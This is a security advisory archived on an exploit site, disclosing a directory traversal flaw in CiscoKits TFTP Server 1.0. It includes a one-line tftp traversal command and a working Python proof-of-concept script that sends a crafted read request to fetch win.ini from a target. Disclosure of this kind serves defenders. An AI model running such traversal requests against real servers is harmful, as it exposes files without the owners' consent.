exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

CiscoKits TFTP Directory Traversal

CiscoKits TFTP Directory Traversal
Posted Aug 5, 2011
Authored by Antu Sanadi | Site secpod.com

CiscoKits TFTP server suffers from a directory traversal vulnerability. Proof of concept exploit is attached to the bottom of this advisory.

tags | exploit, proof of concept, file inclusion
SHA-256 | 161191def09b6edbb36740f1d85f6955252011a6a6ee190d223c5da1d0349b48

CiscoKits TFTP Directory Traversal

Change Mirror Download
###############################################################################
CiscoKits TFTP Server Directory Traversal Vulnerability

SecPod Technologies (www.secpod.com)
Author: Antu Sanadi
###############################################################################

SecPod ID: 1022 21/07/2011 Issue Discovered
03/08/2011 Vendor Notified
Vendor Replied to Disclose
04/08/2011 Advisory Released


Class: Information Disclosure Severity: Medium


Overview:
---------
Ciscokits TFTP Server Version 1.0 is prone to a Directory Traversal
vulnerability.


Technical Description:
----------------------
The vulnerability is caused due to improper validation to Read Request
containing '../' sequences, which allows attackers to read arbitrary files
via directory traversal attacks.


Impact:
--------
Successful exploitation could allow an attacker to obtain sensitive
information, which may lead to launching further attacks.


Affected Software:
------------------
Ciscokits TFTP Server Version 1.0


Tested on:
-----------
Ciscokits TFTP Server Version 1.0 on Windows XP SP3.


References:
-----------
http://secpod.org/blog/?p=301
http://www.certificationkits.com
http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt


Proof of Concept:
----------------
tftp> get ../../../../../../../../../../../windows/win.ini


Solution:
----------
Not available


Risk Factor:
-------------
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = LOW
AUTHENTICATION = NOT_REQUIRED
CONFIDENTIALITY_IMPACT = PARTIAL
INTEGRITY_IMPACT = NONE
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 5.0 (AV:N/AC:L/Au:NR/C:P/I:N/A:N)
CVSS Temporal Score = 4.5
Risk factor = Medium


Credits:
--------
Antu Sanadi of SecPod Technologies has been credited with the discovery of
this vulnerability.


====================================================


#!/usr/bin/python
##############################################################################
# Title : CiscoKits TFTP Server Directory Traversal Vulnerability
# Author : Antu Sanadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.certificationkits.com/cisco-ccna-tftp-server/
# Advisory : http://secpod.org/blog/?p=301
# http://secpod.org/SECPOD_CiscoKits_TFTP_Server_Dir_Trav_POC.py
# http://secpod.org/advisories/SECPOD_CiscoKits_TFTP_Server_Dir_Trav.txt
# Version : CiscoKits CCNA TFTP Server 1.0.0.0
# Date : 21/07/2011
##############################################################################
import sys, socket

def sendPacket(HOST, PORT, data):
'''
Sends UDP Data to a Particular Host on a Specified Port
with a Given Data and Return the Response
'''
udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(data, (HOST, PORT))
data = udp_sock.recv(1024)
udp_sock.close()
return data

if __name__ == "__main__":

if len(sys.argv) < 2:
print "\tUsage: python exploit.py target_ip"
print "\tExample : python exploit.py 127.0.0.1"
print "\tExiting..."
sys.exit(0)

HOST = sys.argv[1] ## The Server IP
PORT = 69 ## Default TFTP port

data = "\x00\x01" ## TFTP Read Request
data += "../" * 10 + "windows/win.ini" + "\x00" ## Read win.ini file using directory traversal
data += "netascii\x00" ## TFTP Type

# netascii
rec_data = sendPacket(HOST, PORT, data)
print "Data Found on the target : %s " %(HOST)
print rec_data.strip()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    2 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close